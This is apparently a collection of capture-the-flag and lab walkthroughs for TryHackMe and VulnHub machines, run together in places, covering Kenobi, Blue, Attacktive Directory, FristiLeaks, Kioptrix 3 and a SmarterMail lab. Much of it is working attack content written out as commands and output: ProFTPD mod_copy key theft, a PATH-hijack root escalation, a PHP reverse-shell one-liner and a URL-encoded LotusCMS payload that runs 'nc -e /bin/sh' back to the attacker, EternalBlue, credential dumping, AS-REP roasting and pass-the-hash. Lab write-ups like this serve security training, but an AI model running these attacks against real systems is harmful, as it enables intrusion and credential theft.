| nfs-statfs:
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|_ /var 9204224.0 1836540.0 6877088.0 22% 16.0T 32000
| nfs-ls: Volume /var
| access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 .
| rwxr-xr-x 0 0 4096 2019-09-04T12:27:33 ..
| rwxr-xr-x 0 0 4096 2019-09-04T12:09:49 backups
| rwxr-xr-x 0 0 4096 2019-09-04T10:37:44 cache
| rwxrwxrwx 0 0 4096 2019-09-04T08:43:56 crash
| rwxrwsr-x 0 50 4096 2016-04-12T20:14:23 local
| rwxrwxrwx 0 0 9 2019-09-04T08:41:33 lock
| rwxrwxr-x 0 108 4096 2019-09-04T10:37:44 log
| rwxr-xr-x 0 0 4096 2019-01-29T23:27:41 snap
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 www
|_
| nfs-showmount:
|_ /var *
Nmap done: 1 IP address (1 host up) scanned in 5.66 seconds
What mount can we see? Answer /varWhat is the version? (FTP) Answer 1.3.5nc 10.10.245.171 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.245.171]
How many exploits are there for the ProFTPd running? Answer 4searchsploit proftp 1.3.5
[i] Found (#2): /opt/exploit-database/files_exploits.csv
[i] To remove this message, please edit "/opt/exploit-database/.searchsploit_rc" which has "package_array: exploitdb" to point too: path_array+=("/opt/exploit-database")
[i] Found (#2): /opt/exploit-database/files_shellcodes.csv
[i] To remove this message, please edit "/opt/exploit-database/.searchsploit_rc" which has "package_array: exploitdb" to point too: path_array+=("/opt/exploit-database")
-------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
-------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
id_rsa file according to given instructionnc 10.10.245.171 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.245.171]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
root@system:/tmp# mkdir /mnt/kenobiNFS
root@system:/tmp# mount 10.10.245.171:/var /mnt/kenobiNFS
root@system:/tmp# ls -la /mnt/kenobiNFS
total 56
drwxr-xr-x 14 root root 4096 Sep 4 2019 .
drwxr-xr-x 3 root root 4096 Feb 29 10:11 ..
drwxr-xr-x 2 root root 4096 Sep 4 2019 backups
drwxr-xr-x 9 root root 4096 Sep 4 2019 cache
drwxrwxrwt 2 root root 4096 Sep 4 2019 crash
drwxr-xr-x 40 root root 4096 Sep 4 2019 lib
drwxrwsr-x 2 root staff 4096 Apr 13 2016 local
lrwxrwxrwx 1 root root 9 Sep 4 2019 lock -> /run/lock
drwxrwxr-x 10 root sgx 4096 Sep 4 2019 log
drwxrwsr-x 2 root mail 4096 Feb 27 2019 mail
drwxr-xr-x 2 root root 4096 Feb 27 2019 opt
lrwxrwxrwx 1 root root 4 Sep 4 2019 run -> /run
drwxr-xr-x 2 root root 4096 Jan 30 2019 snap
drwxr-xr-x 5 root root 4096 Sep 4 2019 spool
drwxrwxrwt 6 root root 4096 Feb 29 10:00 tmp
drwxr-xr-x 3 root root 4096 Sep 4 2019 www
root@system:/tmp# cp /mnt/kenobiNFS/tmp/id_rsa .
root@system:/tmp# chmod 600 id_rsa
root@system:/tmp# ssh -i id_rsa kenobi@10.10.245.171
The authenticity of host '10.10.245.171 (10.10.245.171)' can't be established.
ED25519 key fingerprint is SHA256:GXu1mgqL0Wk2ZHPmEUVIS0hvusx4hk33iTcwNKPktFw.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.245.171' (ED25519) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
103 packages can be updated.
65 updates are security updates.
Last login: Wed Sep 4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
kenobi@kenobi:~$
What is Kenobi's user flag (/home/kenobi/user.txt)? Answer ******************************** 32 alphanumeric characters. Get using cat /home/kenobi/user.txt
What file looks particularly out of the ordinary? Answer /usr/bin/menukenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6
Run the binary, how many options appear? Answer 3kenobi@kenobi:~$ /usr/bin/menu
***************************************
- status check
- kernel version
- ifconfig
** Enter your choice :
strings /usr/bin/menu. (As instructed)
Result shows:** Enter your choice :
curl -I localhost
uname -r
ifconfig
curl -I localhost (As instructed).So we can change it to exploit.kenobi@kenobi:~$ echo "/bin/sh" >curl
kenobi@kenobi:~$ chmod 777 curl
kenobi@kenobi:~$ export PATH=/home/kenobi:$PATH
kenobi@kenobi:~$ /usr/bin/menu
***************************************
- status check
- kernel version
- ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
#
What is the root flag (/root/root.txt)? Answer ******************************** 32 alphanumeric chars. Command used cat /root/root.txtMachine: https://www.vulnhub.com/entry/fristileaks-13,133/
NMap scan shows http port 80 is open. There is a website running there.dirb gives robots.txt url.robots.txt. But those links are not useful.http://192.168.0.10/fristi/.eezeepz Inside an html comment.base64 string inside another html comment.base64 to png, it will load the image with the password keKkeKKeKKeKkEkkEk.eezeepz and password keKkeKKeKKeKkEkkEk..jpg extension.netcat listener with nc -lvp port. Then open the link http://{VM_IP}/fristi/uploads/{upload_file_name} then we will get reverse shell.uname -a we can find that version is vulnerable to dirty cow. I used this exploit https://www.exploit-db.com/exploits/40839 and added a user named firefart as root user with password password.tty shell to make the shell interactive with python -c 'import pty; pty.spawn("/bin/bash")' and login as root user firefart with su firefart.fristileaks_secrets.txt. Inside that file we have the flag Y0u_kn0w_y0u_l0ve_fr1st1.Machine: https://www.vulnhub.com/entry/hacklab-vulnix%2C48/
Now we can Download the 7z file and solve the machine by hosting it inside a virtual box.
perl finger-user-enum.pl -U /opt/metasploit-framework/embedded/framework/data/wordlists/unix_users.txt -t IP_ADRESS we can get many usernames including user.letmein. We can use command, hydra -l user -P /opt/wordlist/rockyou.txt 192.168.0.8 ssh -t 4 to bruteforce ssh with hydra./etc/passwd as vulnix 2008.mount /home/vulnix using nfs.ssh to the machine, with ssh vulnix@192.168.0.8.sudo -l shows /etc/exports is editable. So, added /root *(rw,sync,no_root_squash) to root.trophy.txt is cc614640424f5bd60ce5d5264899c3be.Machine: https://www.vulnhub.com/entry/escalate-my-privileges-1,448/
192.168.0.11.NMap gives some open ports.nmap -A 192.168.0.11 gives an url http://192.168.0.11/phpbash.php.apache.php -r '$sock=fsockopen("192.168.0.4",1337);exec("/bin/sh -i <&3 >&3 2>&3");' with my ip port gives a netcat shell to my listner nc -lvnp 1337.armour./home/armour directory there is a file named Credentials.txt. Inside it we get password md5(rootroot1).md5sum of the rootroot1 to use as password. Then login as armour with md5sum of rootroot1.sudo -l command shows /bin/bash could be used to get root shell.sudo /bin/bash command to root./root/flag.txt by using command.cat /root/flag.txt The flag is 628435356e49f976bab2c04948d22fe4.Machine: https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
LotusCMS RCE exploit. We can find many exploits to get RCE. So, I studied the exploit and crafted a payload for reverse shell. Opening the crafted link gives reverse shell. http://192.168.0.13/index.php?page=index%27)%3B%24{system(%27nc+-e+%2Fbin%2Fsh+<ip address>+<port number>%27)}%3B%23 while listening on netcat if we open that link we will get a reverse shell./home/www/kioptrix3.com/gallery/gconfig.php.http://192.168.0.13/phpmyadmin/.dreg is Mast3r and pasword of loneferret is starwars.loneferret and sudo is enabled there and got some sudo binary.su is not exploitable as user loneferret, so I tried to exploit ht and to exploit ht I need to export TERM=xterm.sudo ht and then pressed F3 to select /etc/sudoers to open./bin/bash to sudoers as instructed in the article and saved the file with F2 and quit with F10 or CTRL+C.sudo /bin/bash to get root shell.Congrats.txt inside /root directory and this is the flag file containing a big paragraph.Room Link: https://thm.com/room/crackthehash
Badges: https://thm.com/ZishanAdThandar/badges/hash-cracker
48bb6e862e54f2a795ffc4e541caed4d. Found this link https://md5.gromweb.com/?md5=48bb6e862e54f2a795ffc4e541caed4d So, It is nd5 of string easy. Also running hashcat with hashcat -D 2 -m 0 hash.txt rockyou.txt gives is answer.hashid on second hash with hashid CBFDAC6008F9CAB4083784CBD1874F76618D2A97 and it shows SHA1 as one of the probable hash. So, again runnning hashcat with -m 100 gives us answer.1C8BFE8F801D79745C4631D09FFF36C82AA37FC4CCE4FC946683D7B336B63032, it shows SHA256. So, used hashcat with -m 1400 gives the answer.$2y$12$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom is bcrypt blowfish. Similarly hashcat with -m 3200 gives answer.279412f945939ba78ce0758d3fd83daa could be md5, md2, md4 etc. After trying hashcat for different hash types, got the answer for md4 with -m 900 give us answer.-m 1400 shows hash F09EDCB1FCEFC6DFB23DC3505A882655FF77375ED8AA2D1C13F640FCCC2D0C85 is encrypted from the asnwer.hash-identifier shows that hash cold be NTLM. So, used hashcat with -m 1000 gives answer.$6$, so hash is SHA512crypt. So, it’s decrypted with hashcat with -m 1800 and the cracked hash is the answer.e5d8870e5bdd26602cab8dbe07a942c8669e56d6 is SHA1 with salt. So, decrypted “e5d8870e5bdd26602cab8dbe07a942c8669e56d6:thm” with salt SHA1 gives us the answer.Room Link: https://thm.com/room/blue
Badges: https://thm.com/ZishanAdThandar/badges/blue
nmap 10.10.248.180 --script vuln -p0-1000Output:
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-27 10:57 IST
Nmap scan report for 10.10.248.180
Host is up (0.20s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
135/tcp open msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-webexec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-webexec: ERROR: Script execution failed (use -d to debug)
Host script results:
|_samba-vuln-cve-2012-1182: ERROR: Script execution failed (use -d to debug)
|_smb-double-pulsar-backdoor: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-conficker: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-cve-2017-7494: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms06-025: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms07-029: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms08-067: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms17-010: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 34.07 seconds
How many ports are open with a port number under 1000? Answer 3What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067) Answer ms17-010msfconsolesearch ms17-010 command
Output:Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........) Ansswer exploit/windows/smb/ms17_010_eternalblueuse exploit/windows/smb/ms17_010_eternalblue commandoptions command, we found that we need to add rhosts with set rhosts 10.10.248.180 and set lhost tun0 commandShow options and set the one required value. What is the name of this value? (All caps for submission) Answer RHOSTSset payload windows/x64/shell/reverse_tcprun and wait for some time.search shell_to_meterpreter to find module to upgrade session to meterpreter.
Output:Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/manage/shell_to_meterpreter normal No Shell to Meterpreter Upgrade
Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/shell_to_meterpreter
If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected) Answer post/multi/manage/shell_to_meterpreterSelect this (use MODULE_PATH). Show options, what option are we required to change? Answer SESSIONmeterpreter > shell
Process 808 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>ps
ps
'ps' is not recognized as an internal or external command,
operable program or batch file.
C:\Windows\system32>exit
exit
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM ...........
...............................................................................
...............................................................................
migrate PROCESS_ID to mmigrate.hashdump to hashes.
Output:meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user? Answer Jonhash.txt and use john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt to crack the hash.Copy this password hash to a file and research how to crack it. What is the cracked password? Answer *******C:\\ abd get first flag using cat flag1.txt.meterpreter > pwd
C:\Windows\system32
meterpreter > cd C:\\
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2018-12-13 08:43:36 +0530 $Recycle.Bin
040777/rwxrwxrwx 0 dir 2009-07-14 10:38:56 +0530 Documents and Settings
040777/rwxrwxrwx 0 dir 2009-07-14 08:50:08 +0530 PerfLogs
040555/r-xr-xr-x 4096 dir 2019-03-18 03:52:01 +0530 Program Files
040555/r-xr-xr-x 4096 dir 2019-03-18 03:58:38 +0530 Program Files (x86)
040777/rwxrwxrwx 4096 dir 2019-03-18 04:05:57 +0530 ProgramData
040777/rwxrwxrwx 0 dir 2018-12-13 08:43:22 +0530 Recovery
040777/rwxrwxrwx 4096 dir 2019-03-18 04:05:55 +0530 System Volume Information
040555/r-xr-xr-x 4096 dir 2018-12-13 08:43:28 +0530 Users
040777/rwxrwxrwx 16384 dir 2019-03-18 04:06:30 +0530 Windows
100666/rw-rw-rw- 24 fil 2019-03-18 00:57:21 +0530 flag1.txt
000000/--------- 0 fif 1970-01-01 05:30:00 +0530 hiberfil.sys
000000/--------- 0 fif 1970-01-01 05:30:00 +0530 pagefile.sys
meterpreter > cat flag1.txt
flag{********************************}
search -f flag2.txt and search -f flag2.txt to find second and third flag to submit, as we already know the first one.meterpreter > search -f flag2.txt
Found 1 result...
=================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Windows\System32\config\flag2.txt 34 2019-03-18 01:02:48 +0530
meterpreter > cat c:\Windows\System32\config\flag2.txt
[-] stdapi_fs_stat: Operation failed: The system cannot find the file specified.
meterpreter > cat "c:\Windows\System32\config\flag2.txt"
flag{********************************s}
meterpreter > search -f flag3.txt
Found 1 result...
=================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Users\Jon\Documents\flag3.txt 37 2019-03-18 00:56:36 +0530
meterpreter > cat "c:\Users\Jon\Documents\flag3.txt"
flag{********************************}
flag{********************************}flag{********************************}flag{********************************}Room Link: https://thm.com/r/room/attacktivedirectory
Start Machine and get Target IP from “Target Machine Information”.Install Impacket, Bloodhound and Neo4j.Complete.Running nmap scan shows some open ports, command used nmap -sV -sC 10.10.94.138.
nmap -sV -sC 10.10.94.138
Starting Nmap 7.94 ( https://nmap.org ) at 2024-08-24 12:12 IST
Nmap scan report for 10.10.94.138
Host is up (0.17s latency).
Not shown: 987 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-24 06:49:23Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-08-24T06:49:42+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2024-08-24T06:49:33+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2024-08-23T06:06:09
|_Not valid after: 2025-02-22T06:06:09
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-08-24T06:49:37
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 449.40 seconds
What tool will allow us to enumerate port 139/445? Answer enum4linux. enum4linux can be used to enumerate 139/445 ports.What is the NetBIOS-Domain Name of the machine? Answer THM-ADWhat invalid TLD do people commonly use for their Active Directory Domain? Answer .localuserlist.txt and passwordlist.txt. So, at first we need to download those wordlists and install kerbrute.spookysec.local to machine ip is in host file. We can simply edit /etc/hosts file in Linux to assign domain to the ip.kerbrute userenum --dc spookysec.local -d spookysec.local userlist.txt to enumerate users. We got some valid usernames after scanning.
james@spookysec.local
svc-admin@spookysec.local
robin@spookysec.local
darkstar@spookysec.local
administrator@spookysec.local
backup@spookysec.local
paradox@spookysec.local
What command within Kerbrute will allow us to enumerate valid usernames? Answer userenum.What notable account is discovered? (These should jump out at you) Answer svc-admin. svc-admin typically suggests a service account (svc) with administrative privileges (admin).What is the other notable account is discovered? (These should jump out at you) Answer backup.GetNPUsers.py -dc-ip spookysec.local spookysec.local/svc-admin -no-pass or GetNPUsers.py -dc-ip spookysec.local spookysec.local/ -no-pass -usersfile user.txt after saving all users to user.txt to capture TGT Token of svc-admin using ASREPRoasting method.GetNPUsers.py -dc-ip spookysec.local spookysec.local/svc-admin -no-pass
Impacket v0.12.0.dev1+20240807.21946.829239e - Copyright 2023 Fortra
[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:92f01444cd97361751ec4fb5b5ea985a$04b60fa94a84739e7db13609241d16247154e8d1f952c26a0c5063e53d08c9a4365690982460f7872d8ade23113cd4df929c85d5404f4380fdcaa5af2ee22d7988d7ee428e535be1b2dcff88bf574d418ca88c3b435cea77b6ea322b510bcf59ac1fba479d54db52104c3bec497cf1b81ddcd384bbb5d115ba2c380f0520705c7b63c88f548f17a9c6c8c1b746175b896b29555a45002ad5195a90d42c45193e42915a1107ed46a6b79da94b835f5e7bd8858c0bb7f07fecab80f7097c769da284ea270697500ea73ea223d93684e8d087248610cf7809d076d5e97564e9729ec5aa04656eaec9f3f5a92ecfaa8524346e93
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password? Answer svc-adminLooking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name) Answer Kerberos 5 AS-REP etype 23. Source: https://hashcat.net/wiki/doku.php?id=example_hashesWhat mode is the hash? Answer 18200 Source: https://hashcat.net/wiki/doku.php?id=example_hashesTGT hash inside a file named hash.txt with given passwordlist and crack it with hashcat -m 18200 hash.txt passwordlist.txt.Now crack the hash with the modified password list provided, what is the user accounts password? Answer management2005smbclient -L \\\\spookysec.local\\ -U 'svc-admin' using password management2005.smbclient -L \\\\spookysec.local\\ -U 'svc-admin'
Password for [WORKGROUP\svc-admin]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
backup share with smbclient using smbclient \\\\spookysec.local\\backup -U 'svc-admin' command and password management2005, We can see backup_credentials.txt file there with ls or dir command. Then we can download backup_credentials.txt with get backup_credentials.txt command.ORKGROUP\svc-admin]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Apr 5 00:38:39 2020
.. D 0 Sun Apr 5 00:38:39 2020
backup_credentials.txt A 48 Sun Apr 5 00:38:53 2020
8247551 blocks of size 4096. 3648829 blocks available
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \>
base64 encoded string YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw. If we decode it using cat backup_credentials.txt |base64 -d command we will get backup@spookysec.local:backup2517860.What utility can we use to map remote SMB shares? Answer smbclientWhich option will list shares? Answer -LHow many remote shares is the server listing? Answer 6There is one particular share that we have access to that contains a text file. Which share is it? Answer backupWhat is the content of the file? Answer YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYwDecoding the contents of the file, what is the full contents? Answer backup@spookysec.local:backup2517860secretsdump.py -dc-ip spookysec.local backup:backup251786@spookysec.local command.secretsdump.py -dc-ip spookysec.local backup:backup2517860@spookysec.local
Impacket v0.12.0.dev1+20240807.21946.829239e - Copyright 2023 Fortra
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213*******97260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
.........
..............
What method allowed us to dump NTDS.DIT? Answer DRSUAPIWhat is the Administrators NTLM hash? Answer 0e0363213e37b94221497260b0bcb4fcWhat method of attack could allow us to authenticate as the user without the password? Answer Pass the hashUsing a tool called Evil-WinRM what option will allow us to use a hash? Answer -Hevil-winrm with evil-winrm -i spookysec.local -u Administrator -H 0e03632*******b0bcb4fc command. We can get three flag files inside three directory.evil-winrm -i spookysec.local -u Administrator -H 0e036321*****97260b0bcb4fc
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\svc-admin\Desktop\user.txt.txt
TryHackMe{K3rb3****4uth}
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\backup\Desktop\PrivEsc.txt
TryHackMe{B4c*****c0tty!}
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
TryHackMe{4ctive*****toryM4st3r}
*Evil-WinRM* PS C:\Users\Administrator\Documents>
svc-admin Answer TryHackMe{K3rb3*****3_4uth}backup Answer TryHackMe{B4*****0tty!}administrator Answer TryHackMe{4ctiv******M4st3r}In this lab, we will exploit a remote code execution vulnerability in build 6985 of the SmarterMail application. This exercise enhances your skills in identifying and exploiting vulnerabilities for gaining access to systems.
This lab demonstrates exploiting a remote code execution vulnerability in SmarterMail build 6985 to gain SYSTEM-level access on a Windows server. Learners will identify the application version, leverage an RCE exploit, and use a reverse shell payload to compromise the target. This lab emphasizes web application exploitation and highlights the risks of unpatched software.
After completion of this lab, learners will be able to:
nmap -A 192.168.53.65
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-17 09:10 UTC
Nmap scan report for 192.168.53.65
Host is up (0.00086s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 04-29-20 10:31PM <DIR> ImapRetrieval
| 07-17-25 02:07AM <DIR> Logs
| 04-29-20 10:31PM <DIR> PopRetrieval
|_04-29-20 10:32PM <DIR> Spool
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
9998/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| uptime-agent-info: HTTP/1.1 400 Bad Request\x0D
| Content-Type: text/html; charset=us-ascii\x0D
| Server: Microsoft-HTTPAPI/2.0\x0D
| Date: Thu, 17 Jul 2025 09:11:05 GMT\x0D
| Connection: close\x0D
| Content-Length: 326\x0D
| \x0D
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">\x0D
| <HTML><HEAD><TITLE>Bad Request</TITLE>\x0D
| <META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>\x0D
| <BODY><h2>Bad Request - Invalid Verb</h2>\x0D
| <hr><p>HTTP Error 400. The request verb is invalid.</p>\x0D
|_</BODY></HTML>\x0D
|_http-server-header: Microsoft-IIS/10.0
Device type: general purpose
Running: Microsoft Windows 10
OS CPE: cpe:/o:microsoft:windows_10
OS details: Microsoft Windows 10 1903 - 21H1
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-07-17T09:11:05
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.88 seconds
ftp 192.168.53.65
Connected to 192.168.53.65.
220 Microsoft FTP Service
Name (192.168.53.65:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
Note: No sensitive data was found in the accessible FTP directories.(Rabbit Hole)
nmap results from earlier we do have .NET remoting running on port 17001. As such this exploit should be applicable to the target machine.nc -lvnp 4444
python3 49216
nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.49.53] from (UNKNOWN) [192.168.53.65] 49906
bash -i
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32>
PS C:\Users\Administrator\Desktop> ls
